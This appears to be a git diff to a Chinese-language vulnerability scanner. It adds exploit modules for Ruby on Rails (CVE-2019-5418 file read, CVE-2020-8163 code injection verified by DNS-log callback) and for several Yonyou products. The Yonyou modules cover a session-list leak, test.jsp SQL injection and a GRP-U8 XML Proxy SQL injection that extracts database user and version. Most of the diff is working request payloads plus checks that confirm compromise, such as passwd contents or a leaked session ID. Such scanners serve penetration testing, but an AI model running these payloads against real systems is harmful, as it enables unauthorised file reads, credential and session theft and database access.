+ vul_info['vul_type'] = 'File-Read'
+ vul_info['vul_id'] = 'CVE-2019-5418'
+ vul_info['vul_method'] = 'GET'
+
+ for payload in self.cve_2019_5418_payloads:
+ path = payload['path']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def cve_2020_8163_scan(self, url):
+ ''' 在 Rails 5.0.1 之前版本中的一个代码注入漏洞,
+ 它允许攻击者控制"render"调用"locals"参数执行RCE
+ '''
+ sessid = '2892b92d3c3a1d8b4ab069947ddbc552'
+
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2020-8163'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2020_8163_payloads:
+ md = random_md5() # * 随机md5值, 8位
+ dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名
+
+ path = payload['path'].replace('DNSdomain', dns_domain)
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (md in dns.result(md, sessid)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.cve_2018_3760_scan, url=url),
+ thread(target=self.cve_2019_5418_scan, url=url),
+ thread(target=self.cve_2020_8163_scan, url=url)
+ ]
+
+rails = RubyOnRails()
diff --git a/payloads/Spring.py b/payloads/Spring.py
index 75c8c3b..a8a4148 100644
--- a/payloads/Spring.py
+++ b/payloads/Spring.py
@@ -290,7 +290,11 @@ def cve_2021_21234_scan(self, url):
logger.logging(vul_info, 'Error')
return None
- if (('/sbin/nologin' in res.text) or ('root:x:0:0:root' in res.text) or ('Microsoft Corp' in res.text) or ('Microsoft TCP/IP for Windows' in res.text)):
+ if (('/sbin/nologin' in res.text)
+ or ('root:x:0:0:root' in res.text)
+ or ('Microsoft Corp' in res.text)
+ or ('Microsoft TCP/IP for Windows' in res.text)
+ ):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
diff --git a/payloads/Yonyou.py b/payloads/Yonyou.py
index a377ccc..e016143 100644
--- a/payloads/Yonyou.py
+++ b/payloads/Yonyou.py
@@ -3,18 +3,36 @@
'''
Yonyou扫描类:
- 用友NC BeanShell远程命令执行漏洞
+ 1. 用友NC BeanShell远程命令执行漏洞
CNVD-2021-30167
- 用友ERP-NC NCFindWeb接口任意文件读取/下载/目录遍历
+
+ 2. 用友ERP-NC NCFindWeb接口任意文件读取/下载/目录遍历
+ 暂无编号
+
+ 3. 用友U8 OA getSessionList.jsp 敏感信息泄漏
+ 暂无编号
+ Payload: https://blog.csdn.net/qq_41617034/article/details/124268004
+
+ 4. 用友U8 OA test.jsp SQL注入
暂无编号
+ Payload: https://blog.csdn.net/qq_41617034/article/details/124268004
+
+ 5. 用友GRP-U8 Proxy SQL注入
+ CNNVD-201610-923
+ Payload: https://blog.csdn.net/qq_41617034/article/details/124268004
+
+
'''
+from lib.api.dns import dns
from lib.initial.config import config
-from lib.tool.md5 import md5
+from lib.tool.md5 import md5, random_md5
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
from thirdparty import requests
+from time import sleep
+import re
class Yonyou():
def __init__(self):
@@ -38,6 +56,39 @@ def __init__(self):
}
]
+ self.yonyou_u8_oa_getsession_payloads = [
+ {
+ 'path': 'yyoa/ext/https/getSessionList.jsp?cmd=getAll',
+ 'data': ''
+ },
+ {
+ 'path': 'getSessionList.jsp?cmd=getAll',
+ 'data': ''
+ }
+ ]
+
+ self.yonyou_u8_oa_test_sqlinject_payloads = [
+ {
+ 'path': 'yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))',
+ 'data': ''
+ },
+ {
+ 'path': 'test.jsp?doType=101&S1=(SELECT%20MD5(1))',
+ 'data': ''
+ }
+ ]
+
+ self.cnnvd_201610_923_payloads = [
+ {
+ 'path': 'Proxy',
+ 'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
+ },
+ {
+ 'path': 'Proxy',
+ 'data': 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>'
+ }
+ ]
+
def cnvd_2021_30167_scan(self, url):
''' 用友NC BeanShell远程命令执行漏洞
给了一个命令执行的页面, 在框框内输入命令, 然后点击按钮就可以运行任意代码
@@ -148,6 +199,155 @@ def yonyou_nc_fileRead_scan(self, url):
}
return results
+ def yonyou_u8_oa_getsession_scan(self, url):
+ ''' 通过该漏洞, 攻击者可以获取数据库中管理员的账户信息以及session, 可利用session登录相关账号 '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name + 'U8-OA'
+ vul_info['vul_type'] = 'DSinfo'
+ vul_info['vul_id'] = 'Yonyou-u8-getSessionList-unAuth'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.yonyou_u8_oa_getsession_payloads:
+ path = payload['path']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ session_re = r'([0-9A-Z]{32})+'
+ if (re.search(session_re, res.text, re.M|re.U)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def yonyou_u8_oa_test_sqlinject_scan(self, url):
+ ''' 由于与致远OA使用相同的文件, 于是存在同样的漏洞 '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name + 'U8-OA'
+ vul_info['vul_type'] = 'SQLinject'
+ vul_info['vul_id'] = 'Yonyou-u8-test.jsp-sqlinject'
+ vul_info['vul_method'] = 'GET'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.yonyou_u8_oa_test_sqlinject_payloads:
+ path = payload['path']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['target'] = target
+
+ try:
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if ('c4ca4238a0b923820dcc509a6f75849b' in res.text):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
+ def cnnvd_201610_923_scan(self, url):
+ '''
+ 用友GRP-u8存在XXE漏洞, 该漏洞源于应用程序解析XML输入时没有禁止外部实体的加载, 导致可加载外部SQL语句
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name + 'GRP-U8'
+ vul_info['vul_type'] = 'SQLinject/RCE'
+ vul_info['vul_id'] = 'CNNVD-201610-923'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cnnvd_201610_923_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ version_re = r'column[1-4]{1}="Microsoft SQL Server \d{1,5} -.*Copyright.*Microsoft Corporation.*"'
+
+ if (re.search(version_re, res.text, re.I|re.M|re.S|re.U)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Request': res
+ }
+ return results
+
def addscan(self, url, vuln=None):
if vuln:
return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
@@ -155,6 +355,9 @@ def addscan(self, url, vuln=None):
return [
thread(target=self.cnvd_2021_30167_scan, url=url),
thread(target=self.yonyou_nc_fileRead_scan, url=url),
+ thread(target=self.yonyou_u8_oa_getsession_scan, url=url),
+ thread(target=self.yonyou_u8_oa_test_sqlinject_scan, url=url),
+ thread(target=self.cnnvd_201610_923_scan, url=url)
]
yonyou = Yonyou()
\ No newline at end of file
diff --git a/payloads/demo.py b/payloads/demo.py
index 3567287..21737f4 100644
--- a/payloads/demo.py
+++ b/payloads/demo.py
@@ -6,6 +6,7 @@
XXXXX 未开启强制路由RCE
CNVD-2018-24942
file:///etc/passwd
+file:///C:/Windows/System32/drivers/etc/hosts
file:///C:\Windows\System32\drivers\etc\hosts
'''
diff --git a/payloads/demo2.py b/payloads/demo2.py
index d3fc0b0..ba06c7d 100644
--- a/payloads/demo2.py
+++ b/payloads/demo2.py
@@ -6,8 +6,8 @@
XXXXX 未开启强制路由RCE
CNVD-2018-24942
file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
file:///C:/Windows/System32/drivers/etc/hosts
+file:///C:\Windows\System32\drivers\etc\hosts
'''
from lib.api.dns import dns